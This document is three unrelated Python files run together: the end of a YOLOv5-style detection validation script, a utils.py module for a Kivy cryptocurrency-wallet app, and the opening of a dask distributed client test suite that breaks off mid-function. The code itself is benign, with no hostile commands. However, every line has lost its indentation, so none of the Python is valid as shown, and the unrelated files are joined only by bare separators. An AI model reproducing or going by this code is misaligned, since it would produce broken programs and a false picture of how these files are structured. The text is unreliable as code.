s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
pbar = tqdm(dataloader, desc=s, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}') # progress bar
for batch_i, (im, targets, paths, shapes) in enumerate(pbar):
t1 = time_sync()
if pt or jit or engine:
im = im.to(device, non_blocking=True)
targets = targets.to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
nb, _, height, width = im.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Inference
out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs
dt[1] += time_sync() - t2
# Loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Metrics
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, im[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()
# Compute metrics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
tp, fp, p, r, f1, ap, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.im_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
LOGGER.info(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--workers', type=int, default=8, help='max dataloader workers (per RANK in DDP mode)')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466
LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
run(**vars(opt))
else:
weights = opt.weights if isinstance(opt.weights, list) else [opt.weights]
opt.half = True # FP16 for fastest results
if opt.task == 'speed': # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
opt.conf_thres, opt.iou_thres, opt.save_json = 0.25, 0.45, False
for opt.weights in weights:
run(**vars(opt), plots=False)
elif opt.task == 'study': # speed vs mAP benchmarks
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
for opt.weights in weights:
f = f'study_{Path(opt.data).stem}_{Path(opt.weights).stem}.txt' # filename to save to
x, y = list(range(256, 1536 + 128, 128)), [] # x axis (image sizes), y axis
for opt.imgsz in x: # img-size
LOGGER.info(f'\nRunning {f} --imgsz {opt.imgsz}...')
r, _, t = run(**vars(opt), plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
utils.py | import os
import threading
from io import StringIO
from kivy.clock import mainthread
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.uix.boxlayout import BoxLayout
from kivy.utils import platform
from kivymd.dialog import MDDialog
from kivymd.label import MDLabel
from kivymd.snackbar import Snackbar
from layoutmargin import AddMargin, MarginLayout
def run_in_thread(fn):
"""
Decorator to run a function in a thread.
>>> 1 + 1
2
>>> @run_in_thread
... def threaded_sleep(seconds):
... from time import sleep
... sleep(seconds)
>>> thread = threaded_sleep(0.1)
>>> type(thread)
<class 'threading.Thread'>
>>> thread.is_alive()
True
>>> thread.join()
>>> thread.is_alive()
False
"""
def run(*k, **kw):
t = threading.Thread(target=fn, args=k, kwargs=kw)
t.start()
return t
return run
def load_kv_from_py(f):
"""
Loads file.kv for given file.py.
"""
filename = os.path.basename(os.path.splitext(f)[0])
Builder.load_file(
os.path.join(
os.path.dirname(os.path.abspath(f)),
filename + '.kv'
)
)
def check_write_permission():
"""
Android runtime storage permission check.
"""
if platform != "android":
return True
from android.permissions import Permission, check_permission
permission = Permission.WRITE_EXTERNAL_STORAGE
return check_permission(permission)
def check_request_write_permission(callback=None):
"""
Android runtime storage permission check & request.
"""
had_permission = check_write_permission()
if not had_permission:
from android.permissions import Permission, request_permissions
permissions = [Permission.WRITE_EXTERNAL_STORAGE]
request_permissions(permissions, callback)
return had_permission
class StringIOCBWrite(StringIO):
"""
Inherits StringIO, provides callback on write.
"""
def __init__(self, initial_value='', newline='\n', callback_write=None):
"""
Overloads the StringIO.__init__() makes it possible to hook a callback
for write operations.
"""
self.callback_write = callback_write
super(StringIOCBWrite, self).__init__(initial_value, newline)
def write(self, s):
"""
Calls the StringIO.write() method then the callback_write with
given string parameter.
"""
super(StringIOCBWrite, self).write(s)
if self.callback_write is not None:
self.callback_write(s)
class Dialog(object):
# keeps track of all dialogs alive
dialogs = []
__lock = threading.Lock()
@staticmethod
@mainthread
def snackbar_message(text):
Snackbar(text=text).show()
@classmethod
def show_invalid_form_dialog(cls):
title = "Invalid form"
body = "Please check form fields."
dialog = cls.create_dialog(title, body)
dialog.open()
@classmethod
def on_dialog_dismiss(cls, dialog):
"""
Removes it from the dialogs track list.
"""
with cls.__lock:
try:
cls.dialogs.remove(dialog)
except ValueError:
# fails silently if the dialog was dismissed twice, refs:
# https://github.com/AndreMiras/PyWallet/issues/89
pass
@classmethod
def dismiss_all_dialogs(cls):
"""
Dispatches dismiss event for all dialogs.
"""
# keeps a local copy since we're altering them as we iterate
dialogs = cls.dialogs[:]
for dialog in dialogs:
dialog.dispatch('on_dismiss')
@classmethod
def create_dialog_content_helper(cls, title, content):
"""
Creates a dialog from given title and content.
Adds it to the dialogs track list.
"""
# TODO
dialog = MDDialog(
title=title,
content=content,
size_hint=(.8, None),
height=dp(250),
auto_dismiss=False)
dialog.bind(on_dismiss=cls.on_dialog_dismiss)
with cls.__lock:
cls.dialogs.append(dialog)
return dialog
@classmethod
def create_dialog_helper(cls, title, body):
"""
Creates a dialog from given title and body.
Adds it to the dialogs track list.
"""
content = MDLabel(
font_style='Body1',
theme_text_color='Secondary',
text=body,
size_hint_y=None,
valign='top')
content.bind(texture_size=content.setter('size'))
dialog = cls.create_dialog_content_helper(title, content)
return dialog
@classmethod
def create_dialog(cls, title, body):
"""
Creates a dialog from given title and body.
Adds it to the dialogs track list.
Appends dismiss action.
"""
dialog = cls.create_dialog_helper(title, body)
dialog.add_action_button(
"Dismiss",
action=lambda *x: dialog.dismiss())
return dialog
@classmethod
def on_balance_connection_error(cls):
title = "Network error"
body = "Couldn't load balance, no network access."
dialog = cls.create_dialog(title, body)
dialog.open()
@classmethod
def on_balance_value_error(cls):
title = "Decode error"
body = "Couldn't not decode balance data."
dialog = cls.create_dialog(title, body)
dialog.open()
@classmethod
def on_balance_unknown_error(cls):
title = "Unknown error"
body = "Unknown error while fetching balance."
dialog = cls.create_dialog(title, body)
dialog.open()
@classmethod
def on_history_connection_error(cls):
title = "Network error"
body = "Couldn't load history, no network access."
dialog = cls.create_dialog(title, body)
dialog.open()
@classmethod
def on_history_value_error(cls):
title = "Decode error"
body = "Couldn't not decode history data."
dialog = cls.create_dialog(title, body)
dialog.open()
class BoxLayoutMarginLayout(MarginLayout, BoxLayout):
pass
class BoxLayoutAddMargin(AddMargin, BoxLayout):
pass
|
test_client.py | import asyncio
import contextlib
import functools
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify, tmpfile
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
pytestmark = pytest.mark.ci1
@gen_cluster(client=True)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10, key="x")
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20, key="y")
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
"""Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x ** 2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_mismatched_client(c, s, a, b):
c2 = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
y = c2.submit(inc, 5)
with pytest.raises(ValueError, match="Futures created by another client"):
await c.gather([x, y])
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
while key in s.tasks and s.tasks[key].who_has:
await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
